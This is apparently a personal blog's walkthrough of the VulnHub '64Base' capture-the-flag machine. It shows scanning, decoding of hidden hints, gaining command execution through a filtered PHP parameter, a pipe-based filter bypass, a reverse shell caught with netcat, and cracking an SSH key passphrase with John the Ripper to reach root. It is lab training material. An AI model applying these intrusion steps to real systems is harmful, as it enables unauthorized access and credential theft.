26 May 2022

Pentesting Fun Stuff

following the cyber security path…

64Base: 1.0.1

Location

https://download.vulnhub.com/64base/64Base_3mrgnc3.ova

Introduction

Author: @3mrgnc3
This is the first public Boot2Root of this author. It’s intended to be more of a fun game than a serious hacking challenge. It is based on the StarWars storyline and is designed to troll you in a fun way. Before starting there is a friendly warning that the box is littered with more than a few “Red Herrings”.
The difficulty rating is beginner – intermediate.
The main goal is to capture 6 flags, each in the format of flag1{ZXhhbXBsZSBmbGFnCg==}.

Getting started

Starting with an nmap scan.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.3
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 08:08 CET
Nmap scan report for 192.168.171.3
Host is up (0.00045s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 429 disallowed entries (15 shown)
| /administrator/ /admin/ /login/ /88888/ /88888888/
| /88888888888/ /88888888888P/ /c3P08P/ /C3p0/ /A280/ /above/ /AC1/
|_/across/ /activation/ /Adjustments/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: 64base
4899/tcp  open  tcpwrapped
62964/tcp open  ssh        OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 59:a5:02:ba:72:8a:2e:c1:9c:ff:cc:b2:f8:15:66:b3 (DSA)
|   2048 2a:57:2c:75:8c:34:9f:28:84:15:07:2a:be:d0:41:98 (RSA)
|_  256 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91 (ECDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.65 seconds

Looks like the website has a ‘robots.txt’, the SSH server sits on an alternate port and 2 ports are tcpwrapped. Let’s start with some banner grabbing.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:22
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
#

A login from the future. 010.101.010.001……..binary perhaps? Read as binary octets it would be 2521. Another port? After a while I decide there is nothing here and take it as my first taste of the trolling.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:80
HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 09:04:50 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT
ETag: "1fdf-542f6bd9b68a0"
Accept-Ranges: bytes
Content-Length: 8159
Vary: Accept-Encoding
Content-Type: text/html

Port 80 seems ok. Nothing special here.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:4899
sshhh! ssh! droids!
So..
You found a way in then...
but, can you pop root?
                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

Nice banner.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:62964
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
Protocol mismatch.
curl: (56) Recv failure: Connection reset by peer
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.171.3 -p 62964
The authenticity of host '[192.168.171.3]:62964 ([192.168.171.3]:62964)' can't be established.
ECDSA key fingerprint is SHA256:PhC0Efn/NWWhDzqb57DDh6SKn5feUean+PfxWhASzx4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.171.3]:62964' (ECDSA) to the list of known hosts.
n13mant@192.168.171.3's password:

And no banner from the SSH server.
On to the webserver.
When I browse to the website I spot a string that looks like base64.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'dmlldyBzb3VyY2UgO0QK' | base64 -d
view source ;D

Looks like I found the first ‘beginners hint’ LOL. In the source code I find a string that looks like hex. Time for another round of decoding.

┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a' | xxd -r -p | base64 -d
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==' | base64 -d
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

Got my first flag, which could also be a set of credentials for further down the road.
When I look at the rest of the pages I notice some randomly placed words with indentation. When I collect these words and put them after each other, they form:
everybody with must die
With what? There wasn’t another word with the same indentation. So for now I move on.
On the /post.html page there is a cool ASCII art poster with an interesting bottom.

A ‘real Imperial-Class BountyHunter’? Maybe a hint for changing my user-agent?
The rest of the pages didn’t look like they had anything of value.
Next is the ‘robots.txt’. It’s a big list and from the looks of it, most pages are empty. To make things a bit easier I copy the list from ‘robots.txt’ and paste it into a file. With the ‘cut’ command I remove the first 11 chars of each line and run the file through wfuzz to eliminate the useless pages. As a result I get 2 pages that seem to be worth investigating.

┌─[n13mant@planetmars]─[~]
└──╼ $wfuzz -c -z file,/home/n13mant/Desktop/sw.lst --hc 404 --hw 0 http://192.168.171.3/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************
Target: http://192.168.171.3/FUZZ
Total requests: 429
==================================================================
ID	Response   Lines      Word         Chars          Request
==================================================================
00000:  C=401     14 L	      54 W	    460 Ch	  "/admin/"
..."
00377:  C=301      9 L	      28 W	    311 Ch	  "/ZZ"
..."
Total time: 0.489533
Processed Requests: 429
Filtered Requests: 427
Requests/sec.: 876.3438

But after checking the complete result of the wfuzz scan I noticed that there were a lot of 404s (that’s why I filtered them in the first place). But why would there be 404 errors for entries in a ‘robots.txt’ list? I re-run wfuzz, but this time focusing on the 404 errors.

┌─[n13mant@planetmars]─[~]
└──╼ $wfuzz -c -z file,/home/n13mant/Desktop/sw.lst --sc 404 http://192.168.171.3/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************
Target: http://192.168.171.3/FUZZ
Total requests: 429
==================================================================
ID	Response   Lines      Word         Chars          Request
==================================================================
00001:  C=404      9 L	      32 W	    291 Ch	  "/administrator..."
00003:  C=404      9 L	      32 W	    283 Ch	  "/login/"
..."
00147:  C=404      9 L	      32 W	    283 Ch	  "/-HH--/"
..."
00166:  C=404      9 L	      32 W	    280 Ch	  "/-l/"
..."
00202:  C=404      9 L	      32 W	    280 Ch	  "/-o/"
..."
00203:  C=404      9 L	      32 W	    283 Ch	  "/-nn--/"
..."
00205:  C=404      9 L	      32 W	    294 Ch	  "/o88888/888888..."
..."8:  C=404      9 L	      32 W	    288 Ch	  "/Office/r/s/"
00209:  C=404      9 L	      32 W	    286 Ch	  "/Office/r/"
..."
00215:  C=404      9 L	      32 W	    285 Ch	  "/oo/----/"
..."
00216:  C=404      9 L	      32 W	    293 Ch	  "/o/-----------..."
00272:  C=404      9 L	      32 W	    282 Ch	  "/-Row/"
..."
00324:  C=404      9 L	      32 W	    295 Ch	  "/thousand/thou..."
00370:  C=404      9 L	      32 W	    295 Ch	  "/XXXXX/XXXXX/X..."
00382:  C=404      9 L	      32 W	    286 Ch	  "/office/s/"
..."
00392:  C=404      9 L	      32 W	    292 Ch	  "/Imperial-clas..."
Total time: 0.511337
Processed Requests: 429
Filtered Requests: 413
Requests/sec.: 838.9754

(Another way of doing this would be to spider the site with burpsuite. It should give a similar result.)
Because I’m getting nowhere with the 404 results, I start with the admin site I found. Maybe the clues and credentials I collected earlier will pay off.

I used the credentials from flag1, but that didn’t work. So I tried it again, but this time with the clue about being an imperial-class bountyhunter. After I changed my user-agent and tried to log in again it still wouldn’t let me in. Guess I was missing something.
Being stuck at the moment I went over my notes and after a while (a long while), I noticed that the spelling of the word Imperial-Class in the clue and in the ‘robots.txt’ list was slightly different. It was a difference of just 1 letter – lower case / upper case.
With the use of cURL I checked the folder ‘/Imperial-Class/’ and this time I got more information.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -vv 192.168.171.3/Imperial-Class/
*   Trying 192.168.171.3...
* Connected to 192.168.171.3 (192.168.171.3) port 80 (#0)
> GET /Imperial-Class/ HTTP/1.1
> Host: 192.168.171.3
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 401 Unauthorized
< Date: Tue, 03 Jan 2017 09:56:26 GMT
< Server: Apache/2.4.10 (Debian)
< WWW-Authenticate: Basic realm="Authorization Required"
< Content-Length: 460
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at 192.168.171.3 Port 80</address>
</body></html>
* Connection #0 to host 192.168.171.3 left intact

Another login prompt, this time HTTP Basic auth. The credentials found earlier worked just fine.

Checking the source code it seems I was still missing something.

<!-- don't forget the BountyHunter login -->

To help me with my search I used cewl to create a wordlist from all the words on the main site and ran it through dirb.

┌─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.171.3/Imperial-Class/ /home/n13mant/Desktop/sw-list.txt -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jan  3 12:21:55 2017
URL_BASE: http://192.168.171.3/Imperial-Class/
WORDLIST_FILES: /home/n13mant/Desktop/sw-list.txt
AUTHORIZATION: 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
-----------------
GENERATED WORDS: 672
---- Scanning URL: http://192.168.171.3/Imperial-Class/ ----
==> DIRECTORY: http://192.168.171.3/Imperial-Class/BountyHunter/
---- Entering directory: http://192.168.171.3/Imperial-Class/BountyHunter/ ----
-----------------
END_TIME: Tue Jan  3 12:21:57 2017
DOWNLOADED: 1344 - FOUND: 0

As the comment said……wow.

When I check the source code of ‘/login.php/’ I get some additional information.

<body bgcolor=#000000><font color=#cfbf00>
<form name="login-form" id="login-form" method="post" action="./login.php">
  <fieldset>
  <legend>Please login:</legend>
  <dl>
    <dt>
      <label title="Username">Username:
      <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" />
      </label>
    </dt>
  </dl>
  <dl>
    <dt>
      <label title="Password">Password:
      <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" />
            </label>
    </dt>
  </dl>
  <dl>
    <dt>
      <label title="Submit">
      <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" />
      <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
      </label>
    </dt>
  </dl>
  </fieldset>
</form>

3 hex strings.

┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756' | xxd -r -p
ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWV
┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756' | xxd -r -p | base64 -d
flag2{aHR0cHM6Ly93d3cuebase64: invalid input

Looks like each id holds only one part of the entire string. After I concatenated the three pieces I got the second flag.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a ' | xxd -r -p | base64 -d
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=' | base64 -d

Time for some videos on YouTube.

Darth Vader belching……..didn’t see that one coming. Nice way of saying I need to use burpsuite.
When I login with the same credentials as before I get the third flag.


The decoded content of the third flag looked like something I’ve already seen in a previous hint
(IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377).

And there is the fourth flag, thanks to remote code execution.
flag4{64base:64base5h377}
Looks like more credentials.
There are a few commands I can execute, like ps, netstat and ls. This way I can get some information about the system.

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:62964           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:4899            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::62964                :::*                    LISTEN      -
tcp6       0      0 ::1:25                  :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN

When I try to use netcat I get another troll.

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░
░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░
░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░
░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░
░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░
░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░
░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░
░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░
░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░
░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░
░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░
░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░
░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░
░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░
░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░
░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░
░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░
░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░
░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░
░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█
Is this the net cat you are looking for?

Later on I found out there was another command I could use, namely wget.
With this command I tried to upload a test file onto the machine. But that didn’t work out so well. After a while it was clear that there was a filter in place. But what kind I didn’t know….yet.
Because the ‘f’ parameter could run several functions (e.g. exec, system) I tried the function ‘var_dump’. This function is used to display structured information about variables. With it I can hopefully find out which chars are being filtered.


Bummer. Looks like all the chars I used got filtered. I need to find a bypass. The only char that isn’t getting filtered is the ‘|’ (pipe) char. And because it looks like I’m stuck inside this ’64base’ binary, I need to break out and execute the ‘wget’ command to upload a file to the remote system.

When trying the ‘uname’ command it wouldn’t work because I was trapped in the 64base binary. But because the pipe char wasn’t being filtered I tried using it to get myself out, with success.

Now to upload a reverse shell script onto the machine. For this I used the reverse shell script from pentestmonkey. After uploading it to the system and running it I got a shell.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 53825
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
 06:20:22 up 23:29,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
www-data@64base:/64base$ strings well_done_:D
strings well_done_:D
sshhh! ssh! droids!
So..
You found a way in then...
but, can you pop root?
                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

Found the troll from earlier.
And when using the more command I get trolled again 🙂

www-data@64base:~/html$ ls -aRl | more
ls -aRl | more
███╗   ███╗ ██████╗ ██████╗ ███████╗██████╗
████╗ ████║██╔═══██╗██╔══██╗██╔════╝╚════██╗
██╔████╔██║██║   ██║██████╔╝█████╗    ▄███╔╝
██║╚██╔╝██║██║   ██║██╔══██╗██╔══╝    ▀▀══╝
██║ ╚═╝ ██║╚██████╔╝██║  ██║███████╗  ██╗
╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝  ╚═╝
███╗   ███╗ ██████╗ ██████╗ ██████╗ ███████╗██╗██╗
████╗ ████║██╔═══██╗██╔══██╗██╔══██╗██╔════╝██║██║
██╔████╔██║██║   ██║██████╔╝██████╔╝█████╗  ██║██║
██║╚██╔╝██║██║   ██║██╔══██╗██╔══██╗██╔══╝  ╚═╝╚═╝
██║ ╚═╝ ██║╚██████╔╝██║  ██║██║  ██║███████╗██╗██╗
╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝╚═╝
██╗   ██╗ ██████╗ ██╗   ██╗    ██╗    ██╗ █████╗ ███╗   ██╗████████╗
╚██╗ ██╔╝██╔═══██╗██║   ██║    ██║    ██║██╔══██╗████╗  ██║╚══██╔══╝
 ╚████╔╝ ██║   ██║██║   ██║    ██║ █╗ ██║███████║██╔██╗ ██║   ██║
  ╚██╔╝  ██║   ██║██║   ██║    ██║███╗██║██╔══██║██║╚██╗██║   ██║
   ██║   ╚██████╔╝╚██████╔╝    ╚███╔███╔╝██║  ██║██║ ╚████║   ██║
   ╚═╝    ╚═════╝  ╚═════╝      ╚══╝╚══╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝
███╗   ███╗ ██████╗ ██████╗ ███████╗██╗██╗██████╗
████╗ ████║██╔═══██╗██╔══██╗██╔════╝██║██║╚════██╗
██╔████╔██║██║   ██║██████╔╝█████╗  ██║██║  ▄███╔╝
██║╚██╔╝██║██║   ██║██╔══██╗██╔══╝  ╚═╝╚═╝  ▀▀══╝
██║ ╚═╝ ██║╚██████╔╝██║  ██║███████╗██╗██╗  ██╗
╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝╚═╝  ╚═╝
ls: write error: Broken pipe

After some more searching I found flag number 5.

www-data@64base:~/html$ cd .admin
cd .admin
bash: cd: .admin: No such file or directory
www-data@64base:~/html$ cd ./admin
cd ./admin
www-data@64base:~/html/admin$ ls -lah
ls -lah
total 28K
drwxr-xr-x   3 www-data www-data 4.0K Dec  6 03:00 .
drwxr-xr-x 431 www-data www-data  12K Dec  6 02:41 ..
-rw-r--r--   1 www-data www-data  113 Dec  6 02:25 .htaccess
drwxr-xr-x   2 root     root     4.0K Dec  6 03:00 S3cR37
-rwxr-xr-x   1 www-data www-data  139 Nov 30 07:02 index.php
www-data@64base:~/html/admin$ cd S3cR37
cd S3cR37
www-data@64base:~/html/admin/S3cR37$ ls -lah
ls -lah
total 200K
drwxr-xr-x 2 root     root     4.0K Dec  6 03:00 .
drwxr-xr-x 3 www-data www-data 4.0K Dec  6 03:00 ..
-------r-- 1 root     root     192K Nov 30 11:31 flag5{TG9vayBJbnNpZGUhIDpECg==}
www-data@64base:~/html/admin/S3cR37$ echo TG9vayBJbnNpZGUhIDpECg== | base64 -d
<n/S3cR37$ echo TG9vayBJbnNpZGUhIDpECg== | base64 -d
Look Inside! :D
www-data@64base:~/html/admin/S3cR37$ file flag5{TG9vayBJbnNpZGUhIDpECg==}
file flag5{TG9vayBJbnNpZGUhIDpECg==}
flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3

A picture. I could download it to my machine, but instead I run strings on it and find a big string at the top that looks like hex. After some decoding I get base64, and when I decode that I get an RSA private key.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
-----END RSA PRIVATE KEY-----

The only thing I haven’t tried is the ssh server on port 62964.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
The authenticity of host '[192.168.171.4]:62964 ([192.168.171.4]:62964)' can't be established.
ECDSA key fingerprint is SHA256:PhC0Efn/NWWhDzqb57DDh6SKn5feUean+PfxWhASzx4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.171.4]:62964' (ECDSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for './Desktop/sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "./Desktop/sshkey": bad permissions
root@192.168.171.4's password:

Wrong permissions.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $chmod 400 ./Desktop/sshkey
┌─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
Enter passphrase for key './Desktop/sshkey':

A passphrase. Time for some cracking.
Because John needs a properly formatted hash I use ‘ssh2john’ to extract the passphrase hash from the private key.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $ssh2john sshkey > converted_key

Now to load the file into John the Ripper and use the well-known rockyou wordlist to hopefully crack the passphrase.

┌─[✗]─[n13mant@planetmars]─[~/Desktop]
└──╼ $john converted_key --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
usetheforce      (sshkey)
1g 0:00:00:01 DONE (2017-01-05 15:48) 0.8196g/s 467452p/s 467452c/s 467452C/s usetheforce
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And after a split second John gives me the passphrase: usetheforce.
For this task I could also have used Phrasen|drescher instead. But John worked out just fine.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
Enter passphrase for key './Desktop/sshkey':
Last login: Tue Dec  6 05:40:07 2016 from 172.16.0.18
flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}

After some final trolling I get the 6th and final flag.

root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d
4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p
NTk2ZDQ2N2E1YTU0NTkzMDQ5NDMzMTZiNDk0MzM5MzI1OTU4NDk3NjYyNDczOTZhNTk1Nzc3NzY0YzZkNzgzMTYxMzI1NjM4NjI0NzU2N2E2Mzc5MzU3OTVhNTc0NjczNDM2NzNkM2QwYQo=
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d
596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a
root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d | xxd -r -p
YmFzZTY0IC1kIC92YXIvbG9jYWwvLmx1a2V8bGVzcy5yZWFsCg==
